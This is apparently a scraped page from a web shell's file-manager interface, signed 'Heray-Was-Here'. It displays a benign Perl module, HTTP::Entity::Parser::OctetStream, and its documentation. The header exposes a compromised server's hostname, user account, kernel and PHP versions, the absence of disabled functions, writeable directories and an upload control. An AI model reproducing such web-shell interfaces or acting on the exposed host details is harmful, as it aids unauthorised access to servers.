Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /usr/share/perl5/vendor_perl/HTTP/Entity/Parser/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/perl5/vendor_perl/HTTP/Entity/Parser/OctetStream.pm
package HTTP::Entity::Parser::OctetStream;

use strict;
use warnings;

sub new {
    bless [], $_[0];
}

sub add { }

sub finalize {
    return ([],[]);
}

1;

__END__

=encoding utf-8

=head1 NAME

HTTP::Entity::Parser::OctetStream - parser for application/octet-stream

=head1 SYNOPSIS

    use HTTP::Entity::Parser;
    
    my $parser = HTTP::Entity::Parser->new;
    my ($params, $uplaods) = $parser->parse($env); # [] , []

=head1 DESCRIPTION

This is a parser class for application/octet-stream and other.
This is used as default parser.

OctetStream always returns empty list.

=head1 LICENSE

Copyright (C) Masahiro Nagano.

This library is free software; you can redistribute it and/or modify
it under the same terms as Perl itself.

=head1 AUTHOR

Masahiro Nagano E<lt>kazeburo@gmail.comE<gt>

Tokuhiro Matsuno E<lt>tokuhirom@gmail.comE<gt>

=cut



Hry